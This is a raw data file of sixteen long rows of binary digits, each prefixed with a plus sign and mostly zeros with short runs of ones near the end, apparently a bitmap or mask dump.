+111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001100000000100100000000000000000000000000001100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001110001100010110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001101100000010010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000100000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000101110110111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000011001101110100001110111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010110010010000101111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001111010010111010111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000100000000000001100000000100100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000101000110100011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001001011001011100111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000100000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000000000000000000000000000000000000000001001011000010001111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111110100011111111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001000110010011011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000001000110100111011111111111111111111111111111111111111111111111111 +111100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000111111100000000000000000011101110000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001111001111100011111111111111111111111111111111111111111111111111 